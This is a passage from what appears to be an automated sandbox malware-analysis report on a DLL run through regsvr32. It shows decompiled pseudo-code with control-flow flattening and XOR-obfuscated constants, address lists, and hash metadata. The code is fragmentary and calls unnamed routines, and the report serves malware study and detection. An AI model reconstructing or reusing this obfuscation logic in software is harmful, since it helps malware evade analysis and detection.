                                                                                                                						_t1337 = 0xfc6825e;
                                                                                                                						goto L1;
                                                                                                                					}
                                                                                                                					_t1373 = _t1337 - 0x3f1714f;
                                                                                                                					if(_t1373 > 0) {
                                                                                                                						__eflags = _t1337 - 0x57e8fe8;
                                                                                                                						if(__eflags > 0) {
                                                                                                                							__eflags = _t1337 - 0x5dc684c;
                                                                                                                							if(_t1337 == 0x5dc684c) {
                                                                                                                								_t1143 = E001AA9CF();
                                                                                                                								asm("sbb esi, esi");
                                                                                                                								_t1337 = ( ~_t1143 & 0x09073ed6) + 0x3f1714f;
                                                                                                                								goto L1;
                                                                                                                							}
                                                                                                                							__eflags = _t1337 - 0x5fa6df0;
                                                                                                                							if(_t1337 == 0x5fa6df0) {
                                                                                                                								_t1144 = E001B17D2(_v544, _v444, _v188);
                                                                                                                								_pop(_t1243);
                                                                                                                								L50:
                                                                                                                								_t1337 = 0x3b09017;
                                                                                                                								goto L1;
                                                                                                                							}
                                                                                                                							__eflags = _t1337 - 0x6090739;
                                                                                                                							if(_t1337 == 0x6090739) {
                                                                                                                								E001C13A3();
                                                                                                                								_t1144 = E001BF5CD();
                                                                                                                								asm("sbb esi, esi");
                                                                                                                								_t1337 = ( ~_t1144 & 0xf62c9fd9) + 0xe12afcd;
                                                                                                                								goto L1;
                                                                                                                							}
                                                                                                                							__eflags = _t1337 - 0x70b268f;
                                                                                                                							if(_t1337 != 0x70b268f) {
                                                                                                                								goto L109;
                                                                                                                							}
                                                                                                                							_t1144 = E001B34DA();
                                                                                                                							__eflags = _t1144;
                                                                                                                							if(__eflags == 0) {
                                                                                                                								goto L113;
                                                                                                                							}
                                                                                                                							_t1337 = 0x475e62a;
                                                                                                                							goto L1;
                                                                                                                						}
                                                                                                                						if(__eflags == 0) {
                                                                                                                							E001B34DA();
                                                                                                                							_t1214 = 0xc3326f0;
                                                                                                                							_push(_v284);
                                                                                                                							_t1144 = E001B96D4(_t1243, _v364);
                                                                                                                							_t1367 = _t1367 + 0xc;
                                                                                                                							_t1335 = _t1144;
                                                                                                                							goto L50;
                                                                                                                						}
                                                                                                                						__eflags = _t1337 - 0x43f4fa6;
                                                                                                                						if(_t1337 == 0x43f4fa6) {
                                                                                                                							_t1144 = E001A9C1B();
                                                                                                                							_t1337 = 0xe12afcd;
                                                                                                                							goto L1;
                                                                                                                						}
                                                                                                                						__eflags = _t1337 - 0x475e62a;
                                                                                                                						if(_t1337 == 0x475e62a) {
                                                                                                                							_t1144 = E001A8844();
                                                                                                                							__eflags = _t1144;
                                                                                                                							if(__eflags == 0) {
                                                                                                                								goto L113;
                                                                                                                							}
                                                                                                                							_t1337 = 0x5dc684c;
                                                                                                                							goto L1;
                                                                                                                						}
                                                                                                                						__eflags = _t1337 - 0x513ed9a;
                                                                                                                						if(_t1337 == 0x513ed9a) {
                                                                                                                							_t1144 = E001A9AF8(_t1214); // executed
                                                                                                                							_t1337 = 0xf20de42;
                                                                                                                							goto L1;
                                                                                                                						}
                                                                                                                						__eflags = _t1337 - 0x51a2f77;
                                                                                                                						if(_t1337 != 0x51a2f77) {
                                                                                                                							goto L109;
                                                                                                                						}
                                                                                                                						_t1144 = E001BFAD1();
                                                                                                                						_v160 = _t1144;
                                                                                                                						_t1337 = 0x7995fdf;
                                                                                                                						goto L1;
                                                                                                                					}
                                                                                                                					if(_t1373 == 0) {
                                                                                                                						__eflags = E001C0E7A();
                                                                                                                						if(__eflags == 0) {
                                                                                                                							_t1144 = E001BF5CD();
                                                                                                                							asm("sbb esi, esi");
                                                                                                                							_t1337 = ( ~_t1144 & 0x0c6dd36a) + 0x30ceba0;
                                                                                                                							goto L1;
                                                                                                                						}
                                                                                                                						_t1144 = E001BF5CD();
                                                                                                                						asm("sbb esi, esi");
                                                                                                                						_t1347 =  ~_t1144 & 0x02a3fc32;
                                                                                                                						__eflags = _t1347;
                                                                                                                						goto L36;
                                                                                                                					}
                                                                                                                					_t1374 = _t1337 - 0x1da2a96;
                                                                                                                					if(_t1374 > 0) {
                                                                                                                						__eflags = _t1337 - 0x30ceba0;
                                                                                                                						if(_t1337 == 0x30ceba0) {
                                                                                                                							_t1144 = E001B9285();
                                                                                                                							_t1337 = 0xcf8b025;
                                                                                                                							goto L1;
                                                                                                                						}
                                                                                                                						__eflags = _t1337 - 0x3624656;
                                                                                                                						if(_t1337 == 0x3624656) {
                                                                                                                							_t1144 = E001C0A01( &_v44, _v428, _v508);
                                                                                                                							_pop(_t1243);
                                                                                                                							__eflags = _t1144;
                                                                                                                							if(__eflags == 0) {
                                                                                                                								_t1144 = _v48;
                                                                                                                								__eflags = _t1144;
                                                                                                                								if(_t1144 == 0) {
                                                                                                                									_push(_v492);
                                                                                                                									_t1335 = E001B96D4(_t1243, _v632);
                                                                                                                									_t1367 = _t1367 + 0xc;
                                                                                                                									_t1144 = _v48;
                                                                                                                								}
                                                                                                                								__eflags = _t1144 - 1;
                                                                                                                								if(__eflags == 0) {
                                                                                                                									_push(_v308);
                                                                                                                									_t1144 = E001B96D4(_t1243, _v356);
                                                                                                                									_t1367 = _t1367 + 0xc;
                                                                                                                								}
                                                                                                                							} else {
                                                                                                                								_t1335 = _v500;
                                                                                                                							}
                                                                                                                							_t1214 = 0xa5ca83d;
                                                                                                                							_t1337 = 0xac07698;
                                                                                                                							goto L1;
                                                                                                                						}
                                                                                                                						__eflags = _t1337 - 0x3b09017;
                                                                                                                						if(_t1337 == 0x3b09017) {
                                                                                                                							__eflags = _t1335 - _v656;
                                                                                                                							if(_t1335 == _v656) {
                                                                                                                								L25:
                                                                                                                								_t1337 = _t1214;
                                                                                                                								goto L109;
                                                                                                                							}
                                                                                                                							_t1243 = E001AEC54();
                                                                                                                							_t1144 = E001A79CC(_t1168, _v648, _t1335, _v252, _v324, _v220);
                                                                                                                							_t1367 = _t1367 + 0x10;
                                                                                                                							__eflags = _t1144 - _v592;
                                                                                                                							if(__eflags == 0) {
                                                                                                                								_t1144 = E001B8966();
                                                                                                                								goto L25;
                                                                                                                							}
                                                                                                                							_t1337 = 0x14336cd;
                                                                                                                							goto L1;
                                                                                                                						}
                                                                                                                						__eflags = _t1337 - 0x3c64cb0;
                                                                                                                						if(_t1337 != 0x3c64cb0) {
                                                                                                                							goto L109;
                                                                                                                						}
                                                                                                                						_t1172 = E001AEC54();
                                                                                                                						_t1243 = _v332;
                                                                                                                						_t1144 = E001BEEC2(_v332,  &_v188, _v260,  &_v180, _v352, _t1172, _v340);
                                                                                                                						_t1367 = _t1367 + 0x14;
                                                                                                                						asm("sbb esi, esi");
                                                                                                                						_t1337 = ( ~_t1144 & 0x06e5afc5) + 0x3c64cb0;
                                                                                                                						goto L1;
                                                                                                                					}
                                                                                                                					if(_t1374 == 0) {
                                                                                                                						_t1144 = E001B17D2(_v600, _v368, _v180);
                                                                                                                						_pop(_t1243);
                                                                                                                						_t1337 = 0x5fa6df0;
                                                                                                                						goto L1;
                                                                                                                					}
                                                                                                                					if(_t1337 == 0x8c289b) {
                                                                                                                						_t1144 = E001B1A83(__eflags);
                                                                                                                						__eflags = _t1144;
                                                                                                                						if(__eflags == 0) {
                                                                                                                							goto L113;
                                                                                                                						}
                                                                                                                						_t1337 = 0x513ed9a;
                                                                                                                						goto L1;
                                                                                                                					}
                                                                                                                					if(_t1337 == 0xbef06d) {
                                                                                                                						_t1144 = E001C1CDC();
                                                                                                                						_v100 = _t1144;
                                                                                                                						_t1337 = 0x51a2f77;
                                                                                                                						goto L1;
                                                                                                                					}
                                                                                                                					if(_t1337 == 0x14336cd) {
                                                                                                                						_t1144 = E001A2F0B(_t1243);
                                                                                                                						goto L113;
                                                                                                                					}
                                                                                                                					if(_t1337 == 0x1c5bef0) {
                                                                                                                						_t1144 = _v348;
                                                                                                                						_t1337 = 0xa5ca83d;
                                                                                                                						_v112 = _t1144;
                                                                                                                						goto L1;
                                                                                                                					}
                                                                                                                					L109:
                                                                                                                					__eflags = _t1337 - 0x56c9a7a;
                                                                                                                				} while (__eflags != 0);
                                                                                                                				goto L113;
                                                                                                                			}
                                                                                                                0x001a59d2
                                                                                                                0x001a59da
                                                                                                                0x001a59e2
                                                                                                                0x001a59f5
                                                                                                                0x001a59fc
                                                                                                                0x001a5a07
                                                                                                                0x001a5a14
                                                                                                                0x001a5a1c
                                                                                                                0x001a5a27
                                                                                                                0x001a5a32
                                                                                                                0x001a5a3d
                                                                                                                0x001a5a48
                                                                                                                0x001a5a53
                                                                                                                0x001a5a69
                                                                                                                0x001a5a70
                                                                                                                0x001a5a7b
                                                                                                                0x001a5a86
                                                                                                                0x001a5a91
                                                                                                                0x001a5a9c
                                                                                                                0x001a5aa7
                                                                                                                0x001a5ab2
                                                                                                                0x001a5abd
                                                                                                                0x001a5ad1
                                                                                                                0x001a5ad6
                                                                                                                0x001a5add
                                                                                                                0x001a5ae8
                                                                                                                0x001a5af3
                                                                                                                0x001a5afe
                                                                                                                0x001a5b09
                                                                                                                0x001a5b14
                                                                                                                0x001a5b1f
                                                                                                                0x001a5b27
                                                                                                                0x001a5b32
                                                                                                                0x001a5b3a
                                                                                                                0x001a5b4a
                                                                                                                0x001a5b50
                                                                                                                0x001a5b58
                                                                                                                0x001a5b60
                                                                                                                0x001a5b6b
                                                                                                                0x001a5b7a
                                                                                                                0x001a5b7f
                                                                                                                0x001a5b88
                                                                                                                0x001a5b93
                                                                                                                0x001a5b9e
                                                                                                                0x001a5ba9
                                                                                                                0x001a5bb4
                                                                                                                0x001a5bbf
                                                                                                                0x001a5bca
                                                                                                                0x001a5bd5
                                                                                                                0x001a5be0
                                                                                                                0x001a5beb
                                                                                                                0x001a5bf3
                                                                                                                0x001a5bfe
                                                                                                                0x001a5c09
                                                                                                                0x001a5c10
                                                                                                                0x001a5c13
                                                                                                                0x001a5c1a
                                                                                                                0x001a5c22
                                                                                                                0x001a5c2d
                                                                                                                0x001a5c38
                                                                                                                0x001a5c4b
                                                                                                                0x001a5c52
                                                                                                                0x001a5c5d
                                                                                                                0x001a5c68
                                                                                                                0x001a5c70
                                                                                                                0x001a5c7d
                                                                                                                0x001a5c91
                                                                                                                0x001a5c96
                                                                                                                0x001a5c9f
                                                                                                                0x001a5caa
                                                                                                                0x001a5cb5
                                                                                                                0x001a5cc0
                                                                                                                0x001a5ccb
                                                                                                                0x001a5cd6
                                                                                                                0x001a5cde
                                                                                                                0x001a5ce6
                                                                                                                0x001a5cee
                                                                                                                0x001a5cf3
                                                                                                                0x001a5cfb
                                                                                                                0x001a5d03
                                                                                                                0x001a5d10
                                                                                                                0x001a5d13
                                                                                                                0x001a5d17
                                                                                                                0x001a5d1f
                                                                                                                0x001a5d27
                                                                                                                0x001a5d32
                                                                                                                0x001a5d3d
                                                                                                                0x001a5d48
                                                                                                                0x001a5d50
                                                                                                                0x001a5d58
                                                                                                                0x001a5d60
                                                                                                                0x001a5d68
                                                                                                                0x001a5d70
                                                                                                                0x001a5d78
                                                                                                                0x001a5d7d
                                                                                                                0x001a5d85
                                                                                                                0x001a5d8d
                                                                                                                0x001a5d95
                                                                                                                0x001a5d9d
                                                                                                                0x001a5da5
                                                                                                                0x001a5dad
                                                                                                                0x001a5db5
                                                                                                                0x001a5dc0
                                                                                                                0x001a5dc8
                                                                                                                0x001a5dd0
                                                                                                                0x001a5ddb
                                                                                                                0x001a5df1
                                                                                                                0x001a5e00
                                                                                                                0x001a5e03
                                                                                                                0x001a5e0a
                                                                                                                0x001a5e15
                                                                                                                0x001a5e20
                                                                                                                0x001a5e28
                                                                                                                0x001a5e33
                                                                                                                0x001a5e3e
                                                                                                                0x001a5e49
                                                                                                                0x001a5e54
                                                                                                                0x001a5e5f
                                                                                                                0x001a5e72
                                                                                                                0x001a5e84
                                                                                                                0x001a5e8b
                                                                                                                0x001a5e93
                                                                                                                0x001a5e9e
                                                                                                                0x001a5ea9
                                                                                                                0x001a5eb0
                                                                                                                0x001a5ebb
                                                                                                                0x001a5ec6
                                                                                                                0x001a5ed2
                                                                                                                0x001a5ed5
                                                                                                                0x001a5ed9
                                                                                                                0x001a5ee1
                                                                                                                0x001a5eeb
                                                                                                                0x001a5ef3
                                                                                                                0x001a5efe
                                                                                                                0x001a5f09
                                                                                                                0x001a5f14
                                                                                                                0x001a5f1f
                                                                                                                0x001a5f27
                                                                                                                0x001a5f35
                                                                                                                0x001a5f3a
                                                                                                                0x001a5f45
                                                                                                                0x001a5f46
                                                                                                                0x001a5f4a
                                                                                                                0x001a5f52
                                                                                                                0x001a5f5d
                                                                                                                0x001a5f68
                                                                                                                0x001a5f73
                                                                                                                0x001a5f7e
                                                                                                                0x001a5f89
                                                                                                                0x001a5f94
                                                                                                                0x001a5f9c
                                                                                                                0x001a5fa4
                                                                                                                0x001a5fa9
                                                                                                                0x001a5fb1
                                                                                                                0x001a5fb9
                                                                                                                0x001a5fc4
                                                                                                                0x001a5fcc
                                                                                                                0x001a5fd7
                                                                                                                0x001a5fe2
                                                                                                                0x001a5fed
                                                                                                                0x001a5ff5
                                                                                                                0x001a5ffd
                                                                                                                0x001a6008
                                                                                                                0x001a6013
                                                                                                                0x001a601e
                                                                                                                0x001a6029
                                                                                                                0x001a6034
                                                                                                                0x001a603f
                                                                                                                0x001a604d
                                                                                                                0x001a6051
                                                                                                                0x001a6059
                                                                                                                0x001a6061
                                                                                                                0x001a6069
                                                                                                                0x001a6074
                                                                                                                0x001a6087
                                                                                                                0x001a608e
                                                                                                                0x001a6099
                                                                                                                0x001a60a1
                                                                                                                0x001a60a9
                                                                                                                0x001a60b2
                                                                                                                0x001a60b6
                                                                                                                0x001a60be
                                                                                                                0x001a60c9
                                                                                                                0x001a60d1
                                                                                                                0x001a60dc
                                                                                                                0x001a60e7
                                                                                                                0x001a60f2
                                                                                                                0x001a60fd
                                                                                                                0x001a6110
                                                                                                                0x001a6117
                                                                                                                0x001a6122
                                                                                                                0x001a612d
                                                                                                                0x001a6138
                                                                                                                0x001a6143
                                                                                                                0x001a615c
                                                                                                                0x001a6167
                                                                                                                0x001a6172
                                                                                                                0x001a6189
                                                                                                                0x001a6196
                                                                                                                0x001a619d
                                                                                                                0x001a61a4
                                                                                                                0x001a61ac
                                                                                                                0x001a61b7
                                                                                                                0x001a61cb
                                                                                                                0x001a61d2
                                                                                                                0x001a61da
                                                                                                                0x001a61e5
                                                                                                                0x001a61f0
                                                                                                                0x001a61fb
                                                                                                                0x001a6206
                                                                                                                0x001a6211
                                                                                                                0x001a621c
                                                                                                                0x001a6227
                                                                                                                0x001a6232
                                                                                                                0x001a623d
                                                                                                                0x001a6248
                                                                                                                0x001a6253
                                                                                                                0x001a625e
                                                                                                                0x001a6269
                                                                                                                0x001a6274
                                                                                                                0x001a627f
                                                                                                                0x001a628a
                                                                                                                0x001a6295
                                                                                                                0x001a62a0
                                                                                                                0x001a62a8
                                                                                                                0x001a62b0
                                                                                                                0x001a62b8
                                                                                                                0x00000000
                                                                                                                0x001a6648
                                                                                                                0x001a6614
                                                                                                                0x001a661d
                                                                                                                0x001a661f
                                                                                                                0x001a661f
                                                                                                                0x00000000
                                                                                                                0x001a661f
                                                                                                                0x001a63b1
                                                                                                                0x001a63b7
                                                                                                                0x001a6456
                                                                                                                0x001a645c
                                                                                                                0x001a65ee
                                                                                                                0x001a65f3
                                                                                                                0x00000000
                                                                                                                0x001a65f3
                                                                                                                0x001a6462
                                                                                                                0x001a6468
                                                                                                                0x001a6556
                                                                                                                0x001a655c
                                                                                                                0x001a655d
                                                                                                                0x001a655f
                                                                                                                0x001a656a
                                                                                                                0x001a6571
                                                                                                                0x001a6573
                                                                                                                0x001a658a
                                                                                                                0x001a659b
                                                                                                                0x001a659d
                                                                                                                0x001a65a0
                                                                                                                0x001a65a0
                                                                                                                0x001a65a7
                                                                                                                0x001a65aa
                                                                                                                0x001a65be
                                                                                                                0x001a65cd
                                                                                                                0x001a65d2
                                                                                                                0x001a65d5
                                                                                                                0x001a6561
                                                                                                                0x001a6561
                                                                                                                0x001a6561
                                                                                                                0x001a65d7
                                                                                                                0x001a65d9
                                                                                                                0x00000000
                                                                                                                0x001a65d9
                                                                                                                0x001a646e
                                                                                                                0x001a6474
                                                                                                                0x001a64e0
                                                                                                                0x001a64e4
                                                                                                                0x001a6536
                                                                                                                0x001a6536
                                                                                                                0x00000000
                                                                                                                0x001a6536
                                                                                                                0x001a64fd
                                                                                                                0x001a6512
                                                                                                                0x001a6517
                                                                                                                0x001a651a
                                                                                                                0x001a651e
                                                                                                                0x001a6531
                                                                                                                0x00000000
                                                                                                                0x001a6531
                                                                                                                0x001a6520
                                                                                                                0x00000000
                                                                                                                0x001a6520
                                                                                                                0x001a6476
                                                                                                                0x001a647c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001a6490
                                                                                                                0x001a64ba
                                                                                                                0x001a64c1
                                                                                                                0x001a64c6
                                                                                                                0x001a64cd
                                                                                                                0x001a64d5
                                                                                                                0x00000000
                                                                                                                0x001a64d5
                                                                                                                0x001a63bd
                                                                                                                0x001a6446
                                                                                                                0x001a644b
                                                                                                                0x001a644c
                                                                                                                0x00000000
                                                                                                                0x001a644c
                                                                                                                0x001a63c5
                                                                                                                0x001a641d
                                                                                                                0x001a6422
                                                                                                                0x001a6424
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001a642a
                                                                                                                0x00000000
                                                                                                                0x001a642a
                                                                                                                0x001a63cd
                                                                                                                0x001a6400
                                                                                                                0x001a6405
                                                                                                                0x001a640c
                                                                                                                0x00000000
                                                                                                                0x001a640c
                                                                                                                0x001a63d5
                                                                                                                0x001a6c4f
                                                                                                                0x00000000
                                                                                                                0x001a6c4f
                                                                                                                0x001a63e1
                                                                                                                0x001a63e7
                                                                                                                0x001a63ee
                                                                                                                0x001a63f0
                                                                                                                0x00000000
                                                                                                                0x001a63f0
                                                                                                                0x001a6c3a
                                                                                                                0x001a6c3a
                                                                                                                0x001a6c3a
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Oj$"'$"T$&G+$'\$(n[$6]$8#B$:_$:mNi$>u$Cf$OTLr$Q|?4$X@$\me$_$$`$iQ\$k*$lA$l}$q~$sC6$tZw$vx$xNEa$xO$~<N$~/\$E$[
                                                                                                                • API String ID: 0-2492860842
                                                                                                                • Opcode ID: 1f65fd24131b639c9fbccfe713c922423b0442757d68f2181b3e34190afbcf77
                                                                                                                • Instruction ID: a3fbe4df508783abd7465c7acff61b9d2d3a76b29266d254c1355050586a27cb
                                                                                                                • Opcode Fuzzy Hash: 1f65fd24131b639c9fbccfe713c922423b0442757d68f2181b3e34190afbcf77
                                                                                                                • Instruction Fuzzy Hash: 30D221769083808BD379CF25C48ABCBBBE1BB95318F14891DE5DD96260DBB09949CF43
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 64%
                                                                                                                			E001A364E(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                				char _v4;
                                                                                                                				char _v8;
                                                                                                                				signed int _v12;
                                                                                                                				intOrPtr _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				signed int _v28;
                                                                                                                				signed int _v32;
                                                                                                                				signed int _v36;
                                                                                                                				signed int _v40;
                                                                                                                				signed int _v44;
                                                                                                                				signed int _v48;
                                                                                                                				signed int _v52;
                                                                                                                				signed int _v56;
                                                                                                                				signed int _v60;
                                                                                                                				signed int _v64;
                                                                                                                				signed int _v68;
                                                                                                                				signed int _v72;
                                                                                                                				signed int _v76;
                                                                                                                				signed int _v80;
                                                                                                                				signed int _v84;
                                                                                                                				signed int _v88;
                                                                                                                				signed int _v92;
                                                                                                                				signed int _v96;
                                                                                                                				signed int _v100;
                                                                                                                				signed int _v104;
                                                                                                                				signed int _v108;
                                                                                                                				signed int _v112;
                                                                                                                				signed int _v116;
                                                                                                                				signed int _v120;
                                                                                                                				signed int _v124;
                                                                                                                				signed int _v128;
                                                                                                                				signed int _v132;
                                                                                                                				intOrPtr _v136;
                                                                                                                				signed int _v140;
                                                                                                                				intOrPtr _v144;
                                                                                                                				signed int _v148;
                                                                                                                				signed int _v152;
                                                                                                                				signed int _v156;
                                                                                                                				signed int _v160;
                                                                                                                				signed int _v164;
                                                                                                                				signed int _v168;
                                                                                                                				void* _t326;
                                                                                                                				intOrPtr _t360;
                                                                                                                				void* _t364;
                                                                                                                				signed int _t366;
                                                                                                                				intOrPtr _t381;
                                                                                                                				intOrPtr _t382;
                                                                                                                				void* _t413;
                                                                                                                				signed int _t420;
                                                                                                                				signed int _t421;
                                                                                                                				signed int _t422;
                                                                                                                				signed int _t423;
                                                                                                                				signed int _t424;
                                                                                                                				signed int _t425;
                                                                                                                				signed int _t426;
                                                                                                                				signed int _t427;
                                                                                                                				signed int _t428;
                                                                                                                				intOrPtr* _t429;
                                                                                                                				signed int _t432;
                                                                                                                				intOrPtr _t437;
                                                                                                                				signed int* _t439;
                                                                                                                				void* _t442;
                                                                                                                
                                                                                                                				_t382 = __ecx;
                                                                                                                				_push(_a12);
                                                                                                                				_v144 = __ecx;
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(__edx);
                                                                                                                				_push(__ecx);
                                                                                                                				E001AC98A(_t326);
                                                                                                                				_v92 = 0x563ef7;
                                                                                                                				_t439 =  &(( &_v168)[5]);
                                                                                                                				_t381 = 0;
                                                                                                                				_t432 = 0x8c861f1;
                                                                                                                				_t437 = 0;
                                                                                                                				_t420 = 5;
                                                                                                                				_v92 = _v92 / _t420;
                                                                                                                				_v92 = _v92 + 0xffff6cb7;
                                                                                                                				_v92 = _v92 ^ 0x0010ac83;
                                                                                                                				_v84 = 0xb18982;
                                                                                                                				_v84 = _v84 << 0xe;
                                                                                                                				_v84 = _v84 ^ 0x62608001;
                                                                                                                				_v104 = 0x3163df;
                                                                                                                				_t421 = 0xc;
                                                                                                                				_v104 = _v104 * 0x65;
                                                                                                                				_v104 = _v104 >> 7;
                                                                                                                				_v104 = _v104 ^ 0x0026f8cc;
                                                                                                                				_v96 = 0xb92cb6;
                                                                                                                				_v96 = _v96 / _t421;
                                                                                                                				_v96 = _v96 << 2;
                                                                                                                				_v96 = _v96 ^ 0x00336e37;
                                                                                                                				_v160 = 0x6b2580;
                                                                                                                				_v160 = _v160 + 0xffffebcd;
                                                                                                                				_v160 = _v160 ^ 0x7cc2f29f;
                                                                                                                				_v160 = _v160 + 0xffff549a;
                                                                                                                				_v160 = _v160 ^ 0x7ca177b6;
                                                                                                                				_v36 = 0xcce3d4;
                                                                                                                				_v36 = _v36 << 8;
                                                                                                                				_v36 = _v36 ^ 0xcce5284a;
                                                                                                                				_v44 = 0x9577c8;
                                                                                                                				_v44 = _v44 | 0x7caf38d4;
                                                                                                                				_v44 = _v44 ^ 0x7cb054a6;
                                                                                                                				_v124 = 0x7abe29;
                                                                                                                				_v124 = _v124 + 0xffffa965;
                                                                                                                				_v124 = _v124 | 0x1a7de5c5;
                                                                                                                				_v124 = _v124 ^ 0x1a70ba68;
                                                                                                                				_v88 = 0x8c9916;
                                                                                                                				_t422 = 0x6f;
                                                                                                                				_v88 = _v88 * 0x79;
                                                                                                                				_v88 = _v88 / _t422;
                                                                                                                				_v88 = _v88 ^ 0x009aa8f8;
                                                                                                                				_v40 = 0xf48a85;
                                                                                                                				_v40 = _v40 + 0xffff29a0;
                                                                                                                				_v40 = _v40 ^ 0x00fe1535;
                                                                                                                				_v64 = 0x2bce2f;
                                                                                                                				_v64 = _v64 + 0xf1c5;
                                                                                                                				_v64 = _v64 ^ 0x0028e256;
                                                                                                                				_v140 = 0x77e17b;
                                                                                                                				_v140 = _v140 | 0xc6b8826a;
                                                                                                                				_v140 = _v140 << 0xb;
                                                                                                                				_v140 = _v140 * 0x6f;
                                                                                                                				_v140 = _v140 ^ 0x9d1458a5;
                                                                                                                				_v52 = 0xfd118a;
                                                                                                                				_v52 = _v52 ^ 0xa24042de;
                                                                                                                				_v52 = _v52 ^ 0xa2b29965;
                                                                                                                				_v156 = 0xb94921;
                                                                                                                				_t423 = 0x71;
                                                                                                                				_v156 = _v156 / _t423;
                                                                                                                				_v156 = _v156 ^ 0x37d84cf7;
                                                                                                                				_v156 = _v156 ^ 0x738f2c3a;
                                                                                                                				_v156 = _v156 ^ 0x445e42c2;
                                                                                                                				_v60 = 0x61301a;
                                                                                                                				_v60 = _v60 ^ 0xe979425d;
                                                                                                                				_v60 = _v60 ^ 0xe9194fd3;
                                                                                                                				_v68 = 0x969166;
                                                                                                                				_t424 = 0x5b;
                                                                                                                				_v68 = _v68 * 0x77;
                                                                                                                				_v68 = _v68 ^ 0x45f3d99e;
                                                                                                                				_v76 = 0x674bab;
                                                                                                                				_v76 = _v76 | 0x0a596e1e;
                                                                                                                				_v76 = _v76 ^ 0x0a785c63;
                                                                                                                				_v80 = 0xc0b1ed;
                                                                                                                				_v80 = _v80 >> 0x10;
                                                                                                                				_v80 = _v80 ^ 0x000eda9f;
                                                                                                                				_v168 = 0x136e5b;
                                                                                                                				_t425 = 0x4c;
                                                                                                                				_v168 = _v168 / _t424;
                                                                                                                				_v168 = _v168 | 0x9a56592d;
                                                                                                                				_v168 = _v168 + 0xffffc214;
                                                                                                                				_v168 = _v168 ^ 0x9a58d8d8;
                                                                                                                				_v24 = 0xe609c7;
                                                                                                                				_v24 = _v24 / _t425;
                                                                                                                				_v24 = _v24 ^ 0x000a865c;
                                                                                                                				_v112 = 0x6bafdb;
                                                                                                                				_v112 = _v112 | 0xd90cd38d;
                                                                                                                				_v112 = _v112 + 0xffffb4ac;
                                                                                                                				_v112 = _v112 ^ 0xd96a74d9;
                                                                                                                				_v48 = 0x718c22;
                                                                                                                				_v48 = _v48 ^ 0x5e6f6b2c;
                                                                                                                				_v48 = _v48 ^ 0x5e1b3469;
                                                                                                                				_v28 = 0x6a5e9f;
                                                                                                                				_t426 = 0x39;
                                                                                                                				_v28 = _v28 / _t426;
                                                                                                                				_v28 = _v28 ^ 0x0002d467;
                                                                                                                				_v148 = 0x1220f7;
                                                                                                                				_t427 = 0x65;
                                                                                                                				_v148 = _v148 / _t427;
                                                                                                                				_v148 = _v148 >> 6;
                                                                                                                				_v148 = _v148 | 0x1e093e29;
                                                                                                                				_v148 = _v148 ^ 0x1e088385;
                                                                                                                				_v116 = 0x15d9ef;
                                                                                                                				_v116 = _v116 + 0x4191;
                                                                                                                				_v116 = _v116 ^ 0x635ba0ed;
                                                                                                                				_v116 = _v116 ^ 0x634c2e10;
                                                                                                                				_v164 = 0x3e804d;
                                                                                                                				_v164 = _v164 | 0xd3c05b93;
                                                                                                                				_t428 = 0x63;
                                                                                                                				_v164 = _v164 * 0x70;
                                                                                                                				_v164 = _v164 + 0xffffea8e;
                                                                                                                				_v164 = _v164 ^ 0xbf879c24;
                                                                                                                				_v72 = 0x4ff13e;
                                                                                                                				_v72 = _v72 / _t428;
                                                                                                                				_v72 = _v72 ^ 0x0007b33f;
                                                                                                                				_v128 = 0xbff743;
                                                                                                                				_v128 = _v128 << 8;
                                                                                                                				_v128 = _v128 + 0xffff3563;
                                                                                                                				_v128 = _v128 ^ 0xbff480eb;
                                                                                                                				_v108 = 0x72d981;
                                                                                                                				_v108 = _v108 + 0xffffa173;
                                                                                                                				_v108 = _v108 * 0x2b;
                                                                                                                				_v108 = _v108 ^ 0x133dd588;
                                                                                                                				_v100 = 0xeb694a;
                                                                                                                				_v100 = _v100 + 0x6185;
                                                                                                                				_v100 = _v100 | 0x4c1b24b5;
                                                                                                                				_v100 = _v100 ^ 0x4cf9785d;
                                                                                                                				_v56 = 0x35076d;
                                                                                                                				_v56 = _v56 + 0xffff253a;
                                                                                                                				_v56 = _v56 ^ 0x003648f7;
                                                                                                                				_v32 = 0xc8662f;
                                                                                                                				_v32 = _v32 << 0xa;
                                                                                                                				_v32 = _v32 ^ 0x219b0029;
                                                                                                                				_v120 = 0x3cbb81;
                                                                                                                				_v120 = _v120 ^ 0x12374250;
                                                                                                                				_v120 = _v120 << 0x10;
                                                                                                                				_v120 = _v120 ^ 0xf9d9ef11;
                                                                                                                				_v20 = 0x4ecff7;
                                                                                                                				_v20 = _v20 >> 5;
                                                                                                                				_v20 = _v20 ^ 0x000e9560;
                                                                                                                				_v152 = 0xf2f051;
                                                                                                                				_v152 = _v152 ^ 0x811bcc4b;
                                                                                                                				_v152 = _v152 ^ 0x85fc57a3;
                                                                                                                				_v152 = _v152 * 0x16;
                                                                                                                				_v152 = _v152 ^ 0x59d22df9;
                                                                                                                				_v132 = 0xe2920e;
                                                                                                                				_v132 = _v132 + 0x7adb;
                                                                                                                				_v132 = _v132 | 0x160b0ff9;
                                                                                                                				_v132 = _v132 ^ 0x16e6d6c2;
                                                                                                                				_t429 = _v12;
                                                                                                                				while(1) {
                                                                                                                					L1:
                                                                                                                					goto L2;
                                                                                                                					do {
                                                                                                                						while(1) {
                                                                                                                							L2:
                                                                                                                							_t442 = _t432 - 0x8fee750;
                                                                                                                							if(_t442 > 0) {
                                                                                                                								break;
                                                                                                                							}
                                                                                                                							if(_t442 == 0) {
